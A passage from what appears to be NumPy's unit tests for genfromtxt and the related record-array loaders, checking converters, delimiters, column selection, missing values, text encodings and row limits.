usecols=(0,1,3), names=None, converters=conv)
control = np.rec.array([(1,5,0), (2,8,1), (3,3,3)], dtype=dtyp)
assert_equal(test, control)
def test_dtype_with_object(self):
# Test using an explicit dtype with an object
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
ndtype = [('nest', [('idx', int), ('code', object)])]
with assert_raises_regex(NotImplementedError,
'Nested fields.* not supported.*'):
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
# nested but empty fields also aren't supported
ndtype = [('idx', int), ('code', object), ('nest', [])]
with assert_raises_regex(NotImplementedError,
'Nested fields.* not supported.*'):
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
def test_dtype_with_object_no_converter(self):
# Object without a converter uses bytes:
parsed = np.genfromtxt(TextIO("1"), dtype=object)
assert parsed[()] == b"1"
parsed = np.genfromtxt(TextIO("string"), dtype=object)
assert parsed[()] == b"string"
def test_userconverters_with_explicit_dtype(self):
# Test user_converters w/ explicit (standard) dtype
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_utf8_userconverters_with_explicit_dtype(self):
utf8 = b'\xcf\x96'
with temppath() as path:
with open(path, 'wb') as f:
f.write(b'skip,skip,2001-01-01' + utf8 + b',1.0,skip')
test = np.genfromtxt(path, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: np.compat.unicode},
encoding='UTF-8')
control = np.array([('2001-01-01' + utf8.decode('UTF-8'), 1.)],
dtype=[('', '|U11'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
# Test space delimiter
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.genfromtxt(data)
control = np.array([[1., 2., 3., 4., 5.],
[6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
# Test using an integer for delimiter
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.genfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
# Test w/ a delimiter tab
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
# Test the selection of columns
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.genfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.genfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.genfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
# Test giving usecols with a comma-separated string
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
# Test usecols with an explicit structured dtype
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.genfromtxt(
data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
# Test usecols with an integer
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
# Test usecols with named columns
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
# Test that an empty file raises the proper warning.
with suppress_warnings() as sup:
sup.filter(message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
# when skip_header > 0
test = np.genfromtxt(data, skip_header=1)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
# Check that a nested dtype isn't MIA
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.genfromtxt(data, dtype=fancydtype, delimiter=',', usemask=True)
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.genfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.genfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.genfromtxt(data, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', float), ('B', float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.genfromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.genfromtxt(TextIO(data),
missing_values={0: -9, 1: -99, 2: -999j}, usemask=True, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.genfromtxt(TextIO(data),
missing_values={0: -9, 'B': -99, 'C': -999j},
usemask=True,
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
# Test with missing and filling values
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0: "N/A", 'b': " ", 2: "???"},
filling_values={0: 0, 'b': 0, 2: -999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
data2 = "1,2,*,4\n5,*,7,8\n"
test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
missing_values="*", filling_values=0)
ctrl = np.array([[1, 2, 0, 4], [5, 0, 7, 8]])
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
missing_values="*", filling_values=-1)
ctrl = np.array([[1, 2, -1, 4], [5, -1, 7, 8]])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.genfromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True, usemask=True)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
# Test masked column
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
# Test masked column
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
# Test invalid raise
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True)
def f():
return np.genfromtxt(mdata, invalid_raise=False, **kwargs)
mtest = assert_warns(ConversionWarning, f)
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.genfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
# Test invalid_raise with usecols
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
def f():
return np.genfromtxt(mdata, usecols=(0, 4), **kwargs)
mtest = assert_warns(ConversionWarning, f)
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.genfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
# Test inconsistent dtype
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x: "(%s)" % x.decode()}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
# Test default format
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
# Test single dtype w/o names
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
# Test single dtype w explicit names
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
# Test single dtype w implicit names
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
# Test easy structured dtype
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
# Test autostrip
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
mtest = np.genfromtxt(TextIO(data), **kwargs)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
mtest = np.genfromtxt(TextIO(data), autostrip=True, **kwargs)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
# Test the 'replace_space' option
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_replace_space_known_dtype(self):
# Test the 'replace_space' (and related) options when dtype != None
txt = "A.A, B (B), C:C\n1, 2, 3"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
# Test w/ incomplete names
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.genfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.genfromtxt(TextIO(data), **kwargs)
def test_names_auto_completion(self):
# Make sure that names are properly completed
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
# Make sure we pick up the right names w/ usecols
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
# Test fix-width w/ names
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
# Test missing values
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values=-999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1], b'testNonetherestofthedata')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1], b' testNonetherestofthedata')
def test_latin1(self):
latin1 = b'\xf6\xfc\xf6'
norm = b"norm1,norm2,norm3\n"
enc = b"test1,testNonethe" + latin1 + b",test3\n"
s = norm + enc + norm
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1, 0], b"test1")
assert_equal(test[1, 1], b"testNonethe" + latin1)
assert_equal(test[1, 2], b"test3")
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',',
encoding='latin1')
assert_equal(test[1, 0], u"test1")
assert_equal(test[1, 1], u"testNonethe" + latin1.decode('latin1'))
assert_equal(test[1, 2], u"test3")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(b"0,testNonethe" + latin1),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test['f0'], 0)
assert_equal(test['f1'], b"testNonethe" + latin1)
def test_binary_decode_autodtype(self):
utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
v = self.loadfunc(BytesIO(utf16), dtype=None, encoding='UTF-16')
assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_utf8_byte_encoding(self):
utf8 = b"\xcf\x96"
norm = b"norm1,norm2,norm3\n"
enc = b"test1,testNonethe" + utf8 + b",test3\n"
s = norm + enc + norm
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
[b'norm1', b'norm2', b'norm3'],
[b'test1', b'testNonethe' + utf8, b'test3'],
[b'norm1', b'norm2', b'norm3']])
assert_array_equal(test, ctl)
def test_utf8_file(self):
utf8 = b"\xcf\x96"
with temppath() as path:
with open(path, "wb") as f:
f.write((b"test1,testNonethe" + utf8 + b",test3\n") * 2)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
ctl = np.array([
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"],
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"]],
dtype=np.unicode_)
assert_array_equal(test, ctl)
# test a mixed dtype
with open(path, "wb") as f:
f.write(b"0,testNonethe" + utf8)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
assert_equal(test['f0'], 0)
assert_equal(test['f1'], "testNonethe" + utf8.decode("UTF-8"))
def test_utf8_file_nodtype_unicode(self):
# bytes encoding with non-latin1 -> unicode upcast
utf8 = u'\u03d6'
latin1 = u'\xf6\xfc\xf6'
# skip test if cannot encode utf8 test string with preferred
# encoding. The preferred encoding is assumed to be the default
# encoding of io.open. Will need to change this for PyTest, maybe
# using pytest.mark.xfail(raises=***).
try:
encoding = locale.getpreferredencoding()
utf8.encode(encoding)
except (UnicodeError, ImportError):
pytest.skip('Skipping test_utf8_file_nodtype_unicode, '
'unable to encode utf8 in preferred encoding')
with temppath() as path:
with io.open(path, "wt") as f:
f.write(u"norm1,norm2,norm3\n")
f.write(u"norm1," + latin1 + u",norm3\n")
f.write(u"test1,testNonethe" + utf8 + u",test3\n")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '',
np.VisibleDeprecationWarning)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',')
# Check for warning when encoding not specified.
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
["norm1", "norm2", "norm3"],
["norm1", latin1, "norm3"],
["test1", "testNonethe" + utf8, "test3"]],
dtype=np.unicode_)
assert_array_equal(test, ctl)
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', int), ('b', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,3')
dtype = [('a', int), ('b', float)]
test = np.recfromcsv(data, missing_values='N/A', dtype=dtype)
control = np.array([(0, 1), (2, 3)],
dtype=dtype)
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#gh-10394
data = TextIO('color\n"red"\n"blue"')
test = np.recfromcsv(data, converters={0: lambda x: x.strip(b'\"')})
control = np.array([('red',), ('blue',)], dtype=[('color', (bytes, 4))])
assert_equal(test.dtype, control.dtype)
assert_equal(test, control)
def test_max_rows(self):
# Test the `max_rows` keyword argument.
data = '1 2\n3 4\n5 6\n7 8\n9 10\n'
txt = TextIO(data)
a1 = np.genfromtxt(txt, max_rows=3)
a2 = np.genfromtxt(txt)
assert_equal(a1, [[1, 2], [3, 4], [5, 6]])
assert_equal(a2, [[7, 8], [9, 10]])
# max_rows must be at least 1.
assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=0)
# An input with several invalid rows.
data = '1 1\n2 2\n0 \n3 3\n4 4\n5 \n6 \n7 \n'
test = np.genfromtxt(TextIO(data), max_rows=2)
control = np.array([[1., 1.], [2., 2.]])
assert_equal(test, control)
# Test keywords conflict
assert_raises(ValueError, np.genfromtxt, TextIO(data), skip_footer=1,
max_rows=4)
# Test with invalid value
assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=4)
# Test with invalid not raise
with suppress_warnings() as sup:
sup.filter(ConversionWarning)
test = np.genfromtxt(TextIO(data), max_rows=4, invalid_raise=False)
control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
assert_equal(test, control)
test = np.genfromtxt(TextIO(data), max_rows=5, invalid_raise=False)
control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
assert_equal(test, control)
# Structured array with field names.
data = 'a b\n#c d\n1 1\n2 2\n#0 \n3 3\n4 4\n5 5\n'
# Test with header, names and comments
txt = TextIO(data)
test = np.genfromtxt(txt, skip_header=1, max_rows=3, names=True)
control = np.array([(1.0, 1.0), (2.0, 2.0), (3.0, 3.0)],
dtype=[('c', '<f8'), ('d', '<f8')])
assert_equal(test, control)
# To continue reading the same "file", don't use skip_header or
# names, and use the previously determined dtype.
test = np.genfromtxt(txt, max_rows=None, dtype=test.dtype)
control = np.array([(4.0, 4.0), (5.0, 5.0)],
dtype=[('c', '<f8'), ('d', '<f8')])
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file
# object
tgt = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
with temppath() as name:
with open(name, 'w') as f:
f.write(data)
res = np.genfromtxt(name)
assert_array_equal(res, tgt)
def test_gft_from_gzip(self):
# Test that we can load data from a gzipped file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
s = BytesIO()
with gzip.GzipFile(fileobj=s, mode='w') as g:
g.write(asbytes(data))
with temppath(suffix='.gz2') as name:
with open(name, 'w') as f:
f.write(data)
assert_array_equal(np.genfromtxt(name), wanted)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_auto_dtype_largeint(self):
# Regression test for numpy/numpy#5635 whereby large integers could
# cause OverflowErrors.
# Test the automatic definition of the output dtype
#
# 2**66 = 73786976294838206464 => should convert to float
# 2**34 = 17179869184 => should convert to int64
# 2**10 = 1024 => should convert to int (int32 on 32-bit systems,
# int64 on 64-bit systems)
data = TextIO('73786976294838206464 17179869184 1024')
test = np.genfromtxt(data, dtype=None)
assert_equal(test.dtype.names, ['f0', 'f1', 'f2'])
assert_(test.dtype['f0'] == float)
assert_(test.dtype['f1'] == np.int64)
assert_(test.dtype['f2'] == np.int_)
assert_allclose(test['f0'], 73786976294838206464.)
assert_equal(test['f1'], 17179869184)
assert_equal(test['f2'], 1024)
def test_unpack_structured(self):
# Regression test for gh-4341
# Unpacking should work on structured arrays
txt = TextIO("M 21 72\nF 35 58")
dt = {'names': ('a', 'b', 'c'), 'formats': ('S1', 'i4', 'f4')}
a, b, c = np.genfromtxt(txt, dtype=dt, unpack=True)
assert_equal(a.dtype, np.dtype('S1'))
assert_equal(b.dtype, np.dtype('i4'))
assert_equal(c.dtype, np.dtype('f4'))
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([72., 58.]))
def test_unpack_auto_dtype(self):
# Regression test for gh-4341
# Unpacking should work when dtype=None
txt = TextIO("M 21 72.\nF 35 58.")
expected = (np.array(["M", "F"]), np.array([21, 35]), np.array([72., 58.]))
test = np.genfromtxt(txt, dtype=None, unpack=True, encoding="utf-8")
for arr, result in zip(expected, test):
assert_array_equal(arr, result)
assert_equal(arr.dtype, result.dtype)
def test_unpack_single_name(self):
# Regression test for gh-4341
# Unpacking should work when structured dtype has only one field
txt = TextIO("21\n35")
dt = {'names': ('a',), 'formats': ('i4',)}
